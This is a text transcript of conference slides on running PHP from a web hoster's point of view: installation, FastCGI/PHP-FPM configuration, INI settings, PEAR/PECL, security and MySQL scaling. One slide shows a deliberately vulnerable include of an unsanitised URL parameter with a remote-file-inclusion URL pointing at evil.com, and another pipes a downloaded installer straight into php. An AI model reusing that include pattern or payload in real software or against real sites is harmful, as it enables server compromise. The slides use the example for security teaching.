Php through the eyes of a hoster confoo
-
Upload
combell-group -
Category
Technology
-
view
2.483 -
download
0
description
Transcript of Php through the eyes of a hoster confoo
PHP through the eyes of a hoster
Thijs FerynEvangelist+32 (0)9 218 79 [email protected]
Very excited to be here !
THIJS
TAZE
Evangelist
@ThijsFeryn
Chapter I : The hoster, a genuine stakeholder in the PHP universe
Stakeholders
Customer Development company
Endusers MGMT
InternalIT
InternalPM
Devs
Sales
MGMT
QA
Design
Systeam
PM
Consultant
Hoster PHP community
Stakeholders
Your app needs to be hosted
Somewhere along the road ...
Goals & mo\ves
Our goals & mo\ves are the same as yours:• It has to work• It has to perform• It has to scale• It has to be secure• It has to be available
What about the Cloud?
Chapter II: Installa\on & configura\on
There’s more than just Apache
Installing from source
server$ ./configure -‐-‐with-‐ttf -‐-‐with-‐freetype-‐dir=/usr/lib -‐-‐prefix=/data/jail/usr/local/php-‐5.3.8 -‐-‐with-‐mysql -‐-‐with-‐mysqli -‐-‐with-‐mssql -‐-‐enable-‐exif -‐-‐enable-‐soap -‐-‐with-‐mcrypt -‐-‐with-‐mhash -‐-‐with-‐curl -‐-‐enable-‐mbstring -‐-‐with-‐gettext -‐-‐with-‐zlib -‐-‐enable-‐ftp -‐-‐with-‐openssl -‐-‐with-‐xsl -‐-‐with-‐db4 -‐-‐with-‐pgsql -‐-‐enable-‐calendar -‐-‐enable-‐bcmath -‐-‐with-‐bz2 -‐-‐with-‐imap=/data/jail/usr/local/imap -‐-‐with-‐imap-‐ssl -‐-‐with-‐pdo-‐mysql=/usr/bin/mysql_config -‐-‐with-‐jpeg-‐dir=/usr/lib -‐-‐with-‐gd -‐-‐enable-‐zip -‐-‐with-‐xmlrpc -‐-‐enable-‐sockets
server$ make
server$ make install
Installing using a package manager (APT/Ap\tude)
Install PHP:
Install MySQL library for PHP:
server$ apt-‐get install php5
server$ apt-‐get install php5-‐mysql
SAPI ... schmapi
Mod_php FastCGI PHP-‐FPM CLI
Web Apache module gateway -‐
Process Apache process php-‐cgi php-‐fpm
daemon php
Configura\on Apache conf files wrapper config per
pool on the fly
User Apache user shell user or suexec user user per pool shell user
FastCGI
Example config:• Apache handler
<IfModule mod_fcgid.c> SuexecUserGroup dev dev PHP_Fix_Pathinfo_Enable 1 <Directory /var/www/dev/www/> Options +ExecCGI AllowOverride All AddHandler fcgid-‐script .php FCGIWrapper /var/www/dev/etc/fcgi.wrapper .php Order allow,deny Allow from all </Directory> </IfModule>
FastCGI
Example config:• Wrapper script
#!/bin/shPHPRC=/usr/local/php-‐5.3.10/etcexport PHPRCexport PHP_FCGI_MAX_REQUESTS=5000export PHP_FCGI_CHILDREN=8exec /usr/local/php-‐5.3.10/bin/php-‐cgi
PHP-‐FPM
Example config in Nginx:server { root /var/www; index index.php index.html index.htm; server_name myserver.ext; location / { try_files $uri $uri/ /index.html; } location ~ \.php$ { fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; }}
PHP-‐FPM
Example config in PHP-‐FPM main www pool:[www]user = www-‐datagroup = www-‐datalisten = 127.0.0.1:9000listen.owner = www-‐datalisten.group = www-‐datalisten.mode = 0666listen.allowed_clients = 127.0.0.1pm = dynamicpm.max_children = 10pm.start_servers = 4pm.min_spare_servers = 2pm.max_spare_servers = 6pm.max_requests = 500
INI sehngs: tales of good & evil
INI sehngs: tales of good & evil
Defining INI sehngs:• Php.ini• Ini_set()• “-‐d” • php_value• php_flag• php_admin_value• php_admin_flag
INI sehngs: tales of good & evil
Memory_limit:
Fatal error: Allowed memory size of 16777216 bytes exhausted (tried to allocate 35 bytes)
INI sehngs: tales of good & evil
Safe_mode & Open_basedir:
<IfModule mod_php5.c> php_admin_flag engine on php_admin_flag safe_mode off php_admin_value open_basedir "/var/www/vhosts/website.com/httpdocs:/tmp"</IfModule>
INI sehngs: tales of good & evil
Allow_url_fopen & allow_url_include:
<?php$lang= $_GET['lang'];require("$lang.php");
http://domain.ext/index.php?lang=http://evil.com/hack.txt?
Chapter III: Versions & features
PHP 4: End of life, but far from dead
PHP 4: End of life, but not yet dead
Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in test.php on line 4
Developers love bling bling
It HAS to be PHP 5.3.10 !!!
I need ALL PHP extension !!!
I use ALL PHP features !!!
And then there’s
DOT
Fruit & vegetables: PEAR & PECL
Fruit & vegetables: PEAR & PECL
PEARPHP Extension and Applica\on Repository (h#p//pear.php.net)
server$ pear install date
server$ lynx -‐source http://pear.php.net/go-‐pear | php
Fruit & vegetables: PEAR & PECL
PECL (pickle)PHP Extension Community Library (h#p//pecl.php.net)
server$ pecl install pecl_http
Popular frameworks outside the PHP project
External frameworks
Chapter IV: PHP aoracts a crowd
It’s easy !
That easy !
<?phpecho "Hello world!";
It’s cheap !
It’s stable !
Everyone can be a PHP developer
But not everyone has what it takes
Luckily there’s a lot ready-‐to-‐use PHP soqware out there
Who you gonna call ?
But when helpers need help ...
They reach out to the PHP community
BlogsForums
User Group mee\ngs
Conferences
PHP.netTwioer
IRC
Chapter V: Here be phpirates
Here be phpirates
Fact
“The majority of hacking/absue cases are PHP related”
False assump\ons
“Open source is evil”
“PHP has lots of security vulnerabili\es and is not mature”
Here be phpirates
The real issues• Quality of the code• Network & server security• PHP version & configura\on
Responsibili\es
Chapter VI: Scalability
Performance == speed
Scalability == constant speed under increasing load
Scaling up
Scaling out
Developers (some2mes) forget ...
Scaling MySQL
mysql> explain SELECT field1, (SELECT COUNT(*) FROM table2 WHERE field3 = table1.id) FROM table1 WHERE field2 = 1 ORDER BY field4 DESC limit 12,12;
*************************** 1. row *************************** id: 1 select_type: PRIMARY table: table1 type: ALLpossible_keys: approved key: approved key_len: NULL ref: NULL rows: 3143 Extra: Using where; Using filesort*************************** 2. row *************************** id: 2 select_type: DEPENDENT SUBQUERY table: table2 type: ALLpossible_keys: NULL key: NULL key_len: NULL ref: NULL rows: 1005 Extra: Using where
mysql> show processlist;+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+| Id | User | Host | db | Command | Time | State | Info |+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+| 63515 | root | localhost | db | Query | 0 | NULL | show processlist || 81763 | root | localhost | db | Sleep | 105 | | NULL || 85187 | root | localhost | db | Query | 0 | Sending data | SELECT data from someTable where field = 'val' || 82701 | root | localhost | db | Query | 0 | Copying to tmp table | SELECT data from someTable where field='val2' || 82709 | root | localhost | db | Query | 0 | Sorting result | SELECT data from someTable where order by field || 82716 | root | localhost | db | Query | 0 | Opening tables | SELECT data from someOtherTable |+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+
Scaling MySQL with replica\on
PHP scalability toolbox
Memcached
Gearman
Varnish
Summary
Summary
1.Hosters are a genuine stakeholder in the PHP universe2.PHP is highly flexible & configurable. Hosters have to ensure a decent setup
3.PHP has a lot to offer feature-‐wise4.PHP aDracts a crowd and brings a lot of people together from different industries (e.g. hosters)
5.Lots of abuse cases are PHP related, but that’s not the fault of PHP itself
6.PHP itself doesn’t scale *that* well, but is flexible enough to ensure scalability via extra tools
Q&A